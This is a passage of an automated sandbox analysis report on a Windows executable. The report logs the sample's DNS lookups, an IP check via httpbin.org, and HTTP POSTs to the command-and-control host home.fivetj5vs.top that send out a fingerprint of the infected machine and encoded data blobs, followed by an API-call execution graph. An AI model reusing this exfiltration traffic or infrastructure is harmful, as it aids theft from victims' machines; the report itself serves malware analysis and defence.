                                        Jan 11, 2025 06:36:27.418648005 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:27.418657064 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:30.613703966 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:30.614289999 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:30.619466066 CET8049706176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:30.619518995 CET4970680192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.341147900 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.346034050 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:31.346133947 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.346358061 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:31.351217031 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.238010883 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.238867998 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.243959904 CET8049707176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.244015932 CET4970780192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.852205038 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.857053995 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:32.857146978 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.873265028 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:32.878093958 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:33.786113024 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:33.786494017 CET4970880192.168.2.8176.53.147.104
                                        Jan 11, 2025 06:36:33.791723013 CET8049708176.53.147.104192.168.2.8
                                        Jan 11, 2025 06:36:33.791776896 CET4970880192.168.2.8176.53.147.104

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 11, 2025 06:36:24.212249041 CET5511553192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:24.212344885 CET5511553192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:24.219350100 CET53551151.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:24.219377041 CET53551151.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:26.420789003 CET5511853192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:26.420850992 CET5511853192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:26.889525890 CET53551181.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:26.889542103 CET53551181.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:30.681777954 CET5512053192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:30.681835890 CET5512053192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:31.149578094 CET53551201.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:31.339991093 CET53551201.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:32.316998005 CET5512253192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:32.317082882 CET5512253192.168.2.81.1.1.1
                                        Jan 11, 2025 06:36:32.846215010 CET53551221.1.1.1192.168.2.8
                                        Jan 11, 2025 06:36:32.846227884 CET53551221.1.1.1192.168.2.8

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 11, 2025 06:36:24.212249041 CET192.168.2.81.1.1.10x762bStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:24.212344885 CET192.168.2.81.1.1.10xd902Standard query (0)httpbin.org28IN (0x0001)false
                                        Jan 11, 2025 06:36:26.420789003 CET192.168.2.81.1.1.10xae30Standard query (0)home.fivetj5vs.topA (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:26.420850992 CET192.168.2.81.1.1.10xfa48Standard query (0)home.fivetj5vs.top28IN (0x0001)false
                                        Jan 11, 2025 06:36:30.681777954 CET192.168.2.81.1.1.10xaaf1Standard query (0)home.fivetj5vs.topA (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:30.681835890 CET192.168.2.81.1.1.10x3734Standard query (0)home.fivetj5vs.top28IN (0x0001)false
                                        Jan 11, 2025 06:36:32.316998005 CET192.168.2.81.1.1.10x9340Standard query (0)home.fivetj5vs.topA (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:32.317082882 CET192.168.2.81.1.1.10x6185Standard query (0)home.fivetj5vs.top28IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 11, 2025 06:36:24.219350100 CET1.1.1.1192.168.2.80x762bNo error (0)httpbin.org50.19.58.113A (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:24.219350100 CET1.1.1.1192.168.2.80x762bNo error (0)httpbin.org3.210.94.60A (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:26.889525890 CET1.1.1.1192.168.2.80xae30No error (0)home.fivetj5vs.top176.53.147.104A (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:31.149578094 CET1.1.1.1192.168.2.80xaaf1No error (0)home.fivetj5vs.top176.53.147.104A (IP address)IN (0x0001)false
                                        Jan 11, 2025 06:36:32.846227884 CET1.1.1.1192.168.2.80x9340No error (0)home.fivetj5vs.top176.53.147.104A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • httpbin.org
                                        • home.fivetj5vs.top

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.849706176.53.147.104807508C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 11, 2025 06:36:26.897887945 CET12360OUTPOST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1
                                        Host: home.fivetj5vs.top
                                        Accept: */*
                                        Content-Type: application/json
                                        Content-Length: 442324
                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 34 34 35 33 32 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8528974808644453208", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                        Jan 11, 2025 06:36:26.902802944 CET2472OUTData Raw: 72 66 6f 79 66 38 41 53 5a 50 6a 76 5c 2f 34 78 5a 34 66 66 5c 2f 56 78 48 38 70 4e 52 79 64 76 78 5c 2f 70 58 37 6f 66 74 70 66 38 45 59 50 42 5c 2f 67 37 77 64 66 66 46 54 39 68 58 51 64 63 30 62 78 62 34 61 69 46 33 34 68 2b 42 64 37 34 70 31
                                        Data Ascii: rfoyf8ASZPjv\/4xZ4ff\/VxH8pNRydvx\/pX7oftpf8EYPB\/g7wdffFT9hXQdc0bxb4aiF34h+Bd74p1zxPoXj3w7a2xN+ng+98VXes+I7TxzCyfbbGzvdfvbLWB52naZb2d41tZal+Deia3Za7Z\/arTzI5IpHtr6xuYzBf6bewsUuLG\/tn\/eW11BIrI8bjBxvQsjKx\/pn6Pn0p+HvG3E4\/hrN8lpcA+IuX06uOXCVTP
                                        Jan 11, 2025 06:36:26.902816057 CET2472OUTData Raw: 2f 77 44 6c 68 2b 66 2b 66 72 36 32 5a 4e 36 62 4e 6a 33 48 5c 2f 4c 78 46 46 39 70 71 4a 30 66 63 37 5c 2f 76 45 5c 2f 64 48 7a 66 79 7a 33 50 2b 52 32 72 6f 4e 43 72 4a 48 74 33 72 73 4d 50 5c 2f 54 50 5c 2f 58 2b 64 37 5c 2f 38 41 36 5c 2f 38
                                        Data Ascii: /wDlh+f+fr62ZN6bNj3H\/LxFF9pqJ0fc7\/vE\/dHzfyz3P+R2roNCrJHt3rsMP\/TP\/X+d7\/8A6\/8ACmbXwGR40h83\/VcTz\/5P5\/yp\/TZ8\/lyx4\/d\/89vx\/Tr+nFDeYI0d\/ueV\/wAs4v8AU\/56Cg6CtJsk37DsTy\/Niz+\/\/wA57+9TfekZHeNPMPEf+v7c\/wCTyKIjujebZsT\/AF3J\/wCXj6f1\/n
                                        Jan 11, 2025 06:36:26.902839899 CET2472OUTData Raw: 71 4e 57 52 2b 7a 5a 64 77 35 77 6a 6d 39 50 44 5a 33 67 71 45 73 58 67 63 77 77 39 44 47 59 4f 4d 63 5a 69 50 71 46 62 44 59 6d 6c 47 76 51 72 51 6a 7a 52 78 6e 4e 4f 45 34 74 63 32 4d 64 50 6c 64 6e 52 35 72 79 4f 5c 2f 31 5c 2f 77 43 4c 6b 58
                                        Data Ascii: qNWR+zZdw5wjm9PDZ3gqEsXgcww9DGYOMcZiPqFbDYmlGvQrQjzRxnNOE4tc2MdPldnR5ryO\/1\/wCLkXhDwt4sbwZ4fg0a1l8P6uNQvPEF\/L4r1G\/tBZTvLZ3llNb6d4Nubd1GyBZfB8t9bsxaG\/MxWQfjhX6B\/GK\/On\/DrxE6MFluorSwjBON\/wBsvraGdR3J+ytO2B1CnoMkfAyruz2xX9e\/RZwleXDfFGd4irW
                                        Jan 11, 2025 06:36:26.902857065 CET2472OUTData Raw: 31 43 5c 2f 33 54 2b 48 38 78 56 71 71 39 42 6f 52 62 44 37 66 35 5c 2f 43 6b 4b 6c 65 63 39 5c 2f 78 71 61 6b 4b 37 76 58 38 4b 6a 6e 58 6e 5c 2f 58 7a 4e 50 61 65 58 34 5c 2f 38 41 70 37 52 5c 2f 65 48 2b 66 78 70 6c 57 4b 69 32 48 32 5c 2f 7a
                                        Data Ascii: 1C\/3T+H8xVqq9BoRbD7f5\/CkKlec9\/xqakK7vX8KjnXn\/XzNPaeX4\/8Ap7R\/eH+fxplWKi2H2\/z+FWdhBJ2\/H+lQd3+g\/lVplzweCKhZccHkGgBj\/dP4fzFMfr+H9TUtNZd2O2KDSn1+RDUPP3Pf\/P4d\/1qambfn3+2P8\/zoNCKq9WKKDoK9Mfp+P8AQ0+kYFvzzQdBB\/Ft7\/p1xUWw+3+fwqV\/9Yf90f0o
                                        Jan 11, 2025 06:36:26.902893066 CET2472OUTData Raw: 35 6b 33 37 6e 35 50 2b 57 58 48 6e 77 66 35 37 65 5c 2f 72 51 75 79 53 4e 5c 2f 77 43 46 5c 2f 77 44 52 5c 2f 4b 5c 2f 65 5c 2f 75 4a 76 7a 5c 2f 35 66 6a 5c 2f 54 74 32 6d 6b 6b 2b 58 48 33 45 38 33 48 5c 2f 54 66 74 5c 2f 6f 76 62 6a 5c 2f 4f
                                        Data Ascii: 5k37n5P+WXHnwf57e\/rQuySN\/wCF\/wDR\/K\/e\/uJvz\/5fj\/Tt2mkk+XH3E83H\/Tft\/ovbj\/OKZI399N\/\/AC2\/d\/8ALH\/9dT7Xzl\/XzOghb7r7\/kT\/AK5fv\/8AP1P60zzPudP+\/vX\/AD\/I1Ptf7jn5\/N\/e+\/Hequ15FCfu9sn\/ACz8ryDz+vPPtzVAPk\/dsmfMR7fMsUcsuOg79aPLdo\/ub8
                                        Jan 11, 2025 06:36:26.902940989 CET2472OUTData Raw: 68 75 6a 75 4c 57 36 67 64 34 70 6f 32 47 51 53 72 48 44 67 71 32 31 67 77 48 35 5a 32 50 37 62 50 37 4f 44 58 45 31 33 71 48 78 4e 4a 75 4c 6d 65 53 35 75 4a 47 38 48 2b 50 6e 61 53 61 61 56 70 5a 5a 47 32 65 46 6d 79 7a 73 7a 4d 66 63 6d 76 38
                                        Data Ascii: hujuLW6gd4po2GQSrHDgq21gwH5Z2P7bP7ODXE13qHxNJuLmeS5uJG8H+PnaSaaVpZZG2eFmyzszMfcmv8AiUh4VeLXiPVzPA8AeGHiLx1i+G8bSpcR4bg7gniXiavw\/XxCxdHC0M7o5LluOqZTXxdTBZhTwtLHQoTrzy\/HRpKUsLWUP+yTNPFDwv4BoZXjOOPEjgHgzC8RYarV4fxHFfGHD3DtHPcPh1hKuKr5NVzjMcHTzO
                                        Jan 11, 2025 06:36:26.902965069 CET2472OUTData Raw: 5a 6e 52 37 5c 2f 39 33 38 53 47 52 63 66 68 5c 2f 49 5c 2f 35 5c 2f 6e 55 4e 57 4b 68 66 37 78 5c 2f 44 2b 51 6f 4e 65 64 2b 58 39 66 4d 72 73 75 33 48 66 4e 4e 71 78 55 54 39 66 77 5c 2f 71 61 44 55 5a 55 45 6b 66 79 39 63 5c 2f 68 5c 2f 6e 72
                                        Data Ascii: ZnR7\/938SGRcfh\/I\/5\/nUNWKhf7x\/D+QoNed+X9fMrsu3HfNNqxUT9fw\/qaDUZUEkfy9c\/h\/nr0qeig6ClJH8vHH17\/wCen0\/VlTP90\/h\/MVDQdBDyx\/zxTP40+pqWTt+P9KjoOyn1+RD8zep\/l\/hmo2jT3CdP85\/z0q1Ucnb8f6UDht8\/0RTki\/uD17f0H+PrzVaRXRj\/AB\/r\/k+h6+tX5P8Ac\/n
                                        Jan 11, 2025 06:36:26.902986050 CET2472OUTData Raw: 5c 2f 73 53 66 6c 32 70 37 62 48 6a 6d 33 2b 59 6e 6d 66 39 73 4d 66 35 5c 2f 38 41 72 35 46 50 6a 5c 2f 65 65 71 50 38 41 38 73 6f 35 49 73 66 35 5c 2f 48 33 6f 41 70 79 66 33 6b 2b 76 6c 66 6d 63 66 79 36 66 6c 33 71 54 7a 45 45 6e 2b 70 38 6d
                                        Data Ascii: \/sSfl2p7bHjm3+Ynmf9sMf5\/8Ar5FPj\/eeqP8A8so5Isf5\/H3oApyf3k+vlfmcfy6fl3qTzEEn+p8maf8Ae5\/13HX\/AETGf88elO3bZE2TRun5\/wCOf6YqFZDH5zOkn7z\/AJ9\/+fcd\/wD9XatPaeX4\/wDAAbJjy9++R383\/VyS\/uOnP\/1x6\/qh8vzP7\/8A2y\/1PH+fzNPX\/ck9\/M\/cf54PtzR8sjTO6
                                        Jan 11, 2025 06:36:26.903019905 CET2472OUTData Raw: 2b 4d 72 66 52 74 52 74 4e 47 75 57 38 50 2b 48 76 46 64 79 7a 52 33 47 69 53 57 73 76 35 6a 4c 78 6b 38 4c 49 59 72 4e 4d 46 55 34 34 79 53 6a 69 73 6c 65 4d 5c 2f 74 4f 6a 58 71 56 71 45 73 4a 48 4c 38 62 69 4d 74 78 74 57 54 72 55 6f 52 71 55
                                        Data Ascii: +MrfRtRtNGuW8P+HvFdyzR3GiSWsv5jLxk8LIYrNMFU44ySjisleM\/tOjXqVqEsJHL8biMtxtWTrUoRqUMNmGDxuDq4ii6lCOJwOOpe058FilS\/Y4+AHjNPB5RmFPw74iq4LPXhFlWIoUcPXjipY7CUMfhIctHEznRqV8FisJioUsRGjU9hjMHVcVHF4Z1frL9mX9r34i\/s26qLbT3fxR8Pr6487W\/Amo3kkNoZHPz6loF4
                                        Jan 11, 2025 06:36:26.907641888 CET2472OUTData Raw: 35 64 31 6a 71 4f 71 61 44 4a 65 36 6e 72 6e 68 66 53 62 45 33 47 6f 36 39 5a 32 7a 66 67 74 62 36 4e 48 30 52 73 4c 68 33 69 63 56 34 6d 63 64 59 57 6e 43 6a 4f 76 4f 4f 4b 34 37 7a 48 44 59 69 6e 54 6f 34 37 44 5a 62 57 39 72 68 4b 2b 55 55 38
                                        Data Ascii: 5d1jqOqaDJe6nrnhfSbE3Go69Z2zfgtb6NH0RsLh3icV4mcdYWnCjOvOOK47zHDYinTo47DZbW9rhK+UU8VSnQx2Kw2HxFKpRjVoTxFN1oQjNSP63w\/09fpz4zFwweC+jh9HnG1qtaNCjPBeCmV4zC4ipPLsVm0HhsdhuJ6uBxNKpl+AxeJp16GIqUKkaFSMKkqnuP9Kf+H0f\/BQL\/oQv2Ov\/AAlvjX\/89Ovz8+LfxY+L3
                                        Jan 11, 2025 06:36:30.613703966 CET138INHTTP/1.1 200 OK
                                        server: nginx/1.22.1
                                        date: Sat, 11 Jan 2025 05:36:30 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1
                                        Data Raw: 30
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.849707176.53.147.104807508C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 11, 2025 06:36:31.346358061 CET98OUTGET /enQdvpMCNJgKflSEBdde1736138767?argument=0 HTTP/1.1
                                        Host: home.fivetj5vs.top
                                        Accept: */*
                                        Jan 11, 2025 06:36:32.238010883 CET353INHTTP/1.1 404 NOT FOUND
                                        server: nginx/1.22.1
                                        date: Sat, 11 Jan 2025 05:36:31 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 207
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.849708176.53.147.104807508C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 11, 2025 06:36:32.873265028 CET171OUTPOST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1
                                        Host: home.fivetj5vs.top
                                        Accept: */*
                                        Content-Type: application/json
                                        Content-Length: 31
                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                        Jan 11, 2025 06:36:33.786113024 CET353INHTTP/1.1 404 NOT FOUND
                                        server: nginx/1.22.1
                                        date: Sat, 11 Jan 2025 05:36:33 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 207
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.84970550.19.58.1134437508C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-11 05:36:24 UTC52OUTGET /ip HTTP/1.1
                                        Host: httpbin.org
                                        Accept: */*
                                        2025-01-11 05:36:25 UTC224INHTTP/1.1 200 OK
                                        Date: Sat, 11 Jan 2025 05:36:25 GMT
                                        Content-Type: application/json
                                        Content-Length: 31
                                        Connection: close
                                        Server: gunicorn/19.9.0
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: true
                                        2025-01-11 05:36:25 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                        Data Ascii: { "origin": "8.46.123.189"}


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        System Behavior

                                        General

                                        Target ID:1
                                        Start time:00:36:20
                                        Start date:11/01/2025
                                        Path:C:\Users\user\Desktop\FYQ6Ee6gbS.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\FYQ6Ee6gbS.exe"
                                        Imagebase:0x220000
                                        File size:4'487'168 bytes
                                        MD5 hash:1149DC52A38AC45DE7BA2D62192C2918
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:1.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:17.2%
                                          Total number of Nodes:290
                                          Total number of Limit Nodes:49
                                          execution_graph 78271 23d5e0 78272 23d652 WSAStartup 78271->78272 78273 23d5f0 78271->78273 78272->78273 78460 25e400 78461 25e412 78460->78461 78462 25e459 78460->78462 78464 2568b0 socket ioctlsocket connect getsockname closesocket 78461->78464 78464->78462 78465 25b3c0 78466 25b3ee 78465->78466 78467 25b3cb 78465->78467 78471 2276a0 78467->78471 78475 259290 78467->78475 78468 25b3ea 78472 2276c0 78471->78472 78473 2276e6 send 78471->78473 78472->78473 78474 2276c9 78472->78474 78473->78474 78474->78468 78476 2276a0 send 78475->78476 78477 2592e5 78476->78477 78478 259392 78477->78478 78479 259335 WSAIoctl 78477->78479 78478->78468 78479->78478 78480 259366 78479->78480 78480->78478 78481 259371 setsockopt 78480->78481 78481->78478 78482 2213c9 78484 221160 78482->78484 78485 2213a1 78484->78485 78486 5a8a20 islower islower 78484->78486 78486->78484 78274 2d4720 78278 2d4728 78274->78278 78275 2d4733 78277 2d4774 78278->78275 78285 2d476c 78278->78285 78286 2d5540 socket ioctlsocket connect getsockname closesocket 78278->78286 78280 2d482e 78280->78285 78287 2d9270 78280->78287 78282 2d4860 78292 2d4950 78282->78292 78284 2d4878 78285->78284 78298 2d30a0 socket ioctlsocket connect getsockname closesocket 78285->78298 78286->78280 78299 2da440 78287->78299 78289 2d9297 78290 2d92ab 78289->78290 78327 2dbbe0 socket ioctlsocket connect getsockname closesocket 78289->78327 78290->78282 78295 2d4966 78292->78295 78293 2d4aa0 gethostname 78294 2d49c5 78293->78294 78297 2d49b9 78293->78297 78294->78285 78295->78294 78295->78297 78328 2dbbe0 socket ioctlsocket connect getsockname closesocket 78295->78328 78297->78293 78297->78294 78298->78277 78325 2da46b 78299->78325 78300 2daa03 RegOpenKeyExA 78301 2daa27 RegQueryValueExA 78300->78301 78302 2dab70 RegOpenKeyExA 78300->78302 78303 2daacc RegQueryValueExA 78301->78303 78308 2daa71 78301->78308 78304 2dac34 RegOpenKeyExA 78302->78304 78322 2dab90 78302->78322 78306 2dab66 RegCloseKey 78303->78306 78309 2dab0e 78303->78309 78305 2dacf8 RegOpenKeyExA 78304->78305 78324 2dac54 78304->78324 78307 2dad56 RegEnumKeyExA 78305->78307 78310 2dad14 78305->78310 78306->78302 78307->78310 78311 2dad9b 78307->78311 78308->78303 78312 2daa85 RegQueryValueExA 78308->78312 78309->78306 78315 2dab1e RegQueryValueExA 78309->78315 78310->78289 78313 2dae16 RegOpenKeyExA 78311->78313 78314 2daab3 78312->78314 78316 2daddf RegEnumKeyExA 78313->78316 78317 2dae34 RegQueryValueExA 78313->78317 78314->78303 78320 2dab4c 78315->78320 78316->78310 78316->78313 78318 2daf43 RegQueryValueExA 78317->78318 78326 2dadaa 78317->78326 78319 2db052 RegQueryValueExA 78318->78319 78318->78326 78321 2dadc7 RegCloseKey 78319->78321 78319->78326 78320->78306 78321->78316 78322->78304 78323 2dafa0 RegQueryValueExA 78323->78326 78324->78305 78325->78300 78325->78310 78326->78318 78326->78319 78326->78321 78326->78323 78327->78290 78328->78297 78487 2d3c00 78488 2d3c23 78487->78488 78490 2d3c0d 78487->78490 78488->78490 78491 2eb180 78488->78491 78494 2eb2e3 78491->78494 78496 2eb19b 78491->78496 78494->78490 78494->78494 78495 2eb2a9 getsockname 78508 2eb020 78495->78508 78496->78494 78496->78495 78498 2eb020 closesocket 78496->78498 78499 2eaf30 78496->78499 78503 2eb060 78496->78503 78498->78496 78500 2eaf4c 78499->78500 78501 2eaf63 socket 78499->78501 78500->78501 78502 2eaf52 78500->78502 78501->78496 78502->78496 78507 2eb080 78503->78507 78504 2eb0b0 connect 78505 2eb0bf WSAGetLastError 78504->78505 78506 2eb0ea 78505->78506 78505->78507 78506->78496 78507->78504 78507->78505 78507->78506 78509 2eb029 78508->78509 78510 2eb052 78508->78510 78511 2eb04b closesocket 78509->78511 78512 2eb03e 78509->78512 78510->78496 78511->78510 78512->78496 78513 2ea080 78516 2e9740 78513->78516 78515 2ea09b 78517 2e9780 78516->78517 78521 2e975d 78516->78521 78518 2e9925 RegOpenKeyExA 78517->78518 78517->78521 78519 2e995a RegQueryValueExA 78518->78519 78518->78521 78520 2e9986 RegCloseKey 78519->78520 78520->78521 78521->78515 78329 22f7b0 78330 22f97a 78329->78330 78333 22f7c3 78329->78333 78331 22f932 78337 25cd80 78331->78337 78333->78330 78333->78331 78352 22fec0 7 API calls 78333->78352 78335 22f942 78336 22f9bb WSACloseEvent 78335->78336 78336->78330 78338 25d0e5 78337->78338 78343 25cd9a 78337->78343 78338->78335 78339 25d0b4 78362 23f6c0 7 API calls 78339->78362 78343->78338 78349 25ce6b 78343->78349 78353 25dc30 socket ioctlsocket connect getsockname closesocket 78343->78353 78344 25d064 78344->78339 78361 25de00 socket ioctlsocket connect getsockname closesocket 78344->78361 78348 25d016 78348->78344 78360 25de00 socket ioctlsocket connect getsockname closesocket 78348->78360 78349->78344 78350 25cf4b 78349->78350 78354 25dc30 socket ioctlsocket connect getsockname closesocket 78349->78354 78350->78348 78355 25e130 socket ioctlsocket connect getsockname closesocket 78350->78355 78356 236fa0 78350->78356 78352->78333 78353->78343 78354->78349 78355->78350 78358 236fd4 78356->78358 78359 236feb 78356->78359 78357 237207 select 78357->78359 78358->78357 78358->78359 78359->78350 78360->78348 78361->78344 78362->78338 78363 2595b0 78364 2595fd 78363->78364 78365 2595c8 78363->78365 78365->78364 78367 25a150 78365->78367 78368 25a15f 78367->78368 78370 25a1d0 78367->78370 78369 25a181 getsockname 78368->78369 78368->78370 78369->78370 78370->78364 78371 256ab0 78372 256ad5 78371->78372 78373 256bb4 78372->78373 78374 236fa0 select 78372->78374 78375 2d5ed0 